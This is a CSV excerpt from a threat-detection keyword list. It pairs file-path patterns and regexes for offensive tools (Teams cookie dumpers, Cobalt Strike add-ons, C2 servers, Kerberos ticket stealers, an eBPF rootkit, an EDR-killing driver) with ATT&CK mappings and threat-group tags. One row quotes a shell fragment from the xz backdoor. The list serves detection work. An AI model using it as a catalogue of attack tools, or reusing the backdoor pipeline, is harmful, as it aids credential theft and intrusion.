"*/teams_cookies_output.json*",".{0,1000}\/teams_cookies_output\.json.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","N/A","7","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","11835"
"*/teams_dump.git*",".{0,1000}\/teams_dump\.git.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","N/A","7","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","11836"
"*/teams_dump.git*",".{0,1000}\/teams_dump\.git.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","N/A","9","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","11837"
"*/teams_dump.py*",".{0,1000}\/teams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","N/A","7","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","11838"
"*/teams_dump.py*",".{0,1000}\/teams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","N/A","9","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","11839"
"*/teams_localdb.py*",".{0,1000}\/teams_localdb\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","11840"
"*/TeamsEnum.git*",".{0,1000}\/TeamsEnum\.git.{0,1000}","offensive_tool_keyword","TeamsEnum","User Enumeration of Microsoft Teams users via API","T1589.002 - T1590","TA0007 - TA0001","N/A","Black Basta","Discovery","https://github.com/sse-secure-systems/TeamsEnum","1","1","N/A","N/A","6","2","153","21","2024-03-27T18:14:25Z","2023-04-03T18:35:15Z","11841"
"*/teamsenum.py*",".{0,1000}\/teamsenum\.py.{0,1000}","offensive_tool_keyword","TeamsEnum","User Enumeration of Microsoft Teams users via API","T1589.002 - T1590","TA0007 - TA0001","N/A","Black Basta","Discovery","https://github.com/sse-secure-systems/TeamsEnum","1","1","N/A","N/A","6","2","153","21","2024-03-27T18:14:25Z","2023-04-03T18:35:15Z","11842"
"*/teamserver.service*",".{0,1000}\/teamserver\.service.{0,1000}","offensive_tool_keyword","cobaltstrike","teamserver cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/ElevateKit","1","0","#linux","N/A","10","10","912","203","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z","11843"
"*/TeamServer_linux *",".{0,1000}\/TeamServer_linux\s.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#linux","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","11844"
"*/TeamServer_win.exe*",".{0,1000}\/TeamServer_win\.exe.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","1","N/A","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","11845"
"*/teamserver-linux.tar.gz*",".{0,1000}\/teamserver\-linux\.tar\.gz.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","#linux","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","11846"
"*/teamserver-win.zip*",".{0,1000}\/teamserver\-win\.zip.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","11847"
"*/teamspeak2-version.nse*",".{0,1000}\/teamspeak2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11848"
"*/teamstracker.db*",".{0,1000}\/teamstracker\.db.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","N/A","3","1","54","4","2024-06-27T11:57:35Z","2023-08-15T03:41:46Z","11849"
"*/teamstracker.git*",".{0,1000}\/teamstracker\.git.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","N/A","3","1","54","4","2024-06-27T11:57:35Z","2023-08-15T03:41:46Z","11850"
"*/teamstracker.py*",".{0,1000}\/teamstracker\.py.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","N/A","3","1","54","4","2024-06-27T11:57:35Z","2023-08-15T03:41:46Z","11851"
"*/TelegramRAT.git*",".{0,1000}\/TelegramRAT\.git.{0,1000}","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","N/A","10","10","372","62","2024-01-23T12:05:59Z","2023-06-30T10:59:55Z","11857"
"*/Telemetry.git*",".{0,1000}\/Telemetry\.git.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","1","N/A","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","11858"
"*/telnet_cdata_ftth_backdoor_userpass.txt*",".{0,1000}\/telnet_cdata_ftth_backdoor_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11859"
"*/telnet-brute.nse*",".{0,1000}\/telnet\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11860"
"*/telnet-encryption.nse*",".{0,1000}\/telnet\-encryption\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11861"
"*/telnet-ntlm-info.nse*",".{0,1000}\/telnet\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11862"
"*/terminate/Terminator.sys*",".{0,1000}\/terminate\/Terminator\.sys.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","10","4","341","66","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z","11863"
"*/test_privesc.py*",".{0,1000}\/test_privesc\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","1","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","11864"
"*/test32.dll*",".{0,1000}\/test32\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","N/A","10","10","151","23","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z","11866"
"*/test64.dll*",".{0,1000}\/test64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","N/A","10","10","151","23","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z","11867"
"*/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|*",".{0,1000}\/tests\/files\/good\-large_compressed\.lzma\|eval\s\$i\|tail\s\-c\s\+31265\|.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#linux","rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","10","10","N/A","N/A","N/A","N/A","11868"
"*/tests/NIST_CAVS/*.rsp*",".{0,1000}\/tests\/NIST_CAVS\/.{0,1000}\.rsp.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","11869"
"*/tests/test-bof.ps1*",".{0,1000}\/tests\/test\-bof\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nettitude/RunOF","1","1","N/A","N/A","10","10","145","21","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z","11870"
"*/tevora-threat/PowerView*",".{0,1000}\/tevora\-threat\/PowerView.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","N/A","10","10","130","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z","11871"
"*/TFG/src/helpers/execve_hijack*",".{0,1000}\/TFG\/src\/helpers\/execve_hijack.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","11872"
"*/tftp-enum.nse*",".{0,1000}\/tftp\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11873"
"*/TGSThief.git*",".{0,1000}\/TGSThief\.git.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","N/A","9","2","181","27","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z","11874"
"*/TGSThief/*",".{0,1000}\/TGSThief\/.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","N/A","9","2","181","27","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z","11875"
"*/TGT_Monitor.git*",".{0,1000}\/TGT_Monitor\.git.{0,1000}","offensive_tool_keyword","TGT_Monitor","This script continuously monitors cache for new TGTs and displays them on the screen (admin privs required)","T1557.001 - T1040","TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/TGT_Monitor","1","1","N/A","N/A","9","1","3","0","2023-11-08T18:48:55Z","2023-11-07T22:53:45Z","11876"
"*/TGT_Monitor.ps1*",".{0,1000}\/TGT_Monitor\.ps1.{0,1000}","offensive_tool_keyword","TGT_Monitor","This script continuously monitors cache for new TGTs and displays them on the screen (admin privs required)","T1557.001 - T1040","TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/TGT_Monitor","1","1","N/A","N/A","9","1","3","0","2023-11-08T18:48:55Z","2023-11-07T22:53:45Z","11877"
"*/tgtParse.py*",".{0,1000}\/tgtParse\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","11878"
"*/tgtParse/tgtParse.*",".{0,1000}\/tgtParse\/tgtParse\..{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","N/A","10","10","173","24","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z","11879"
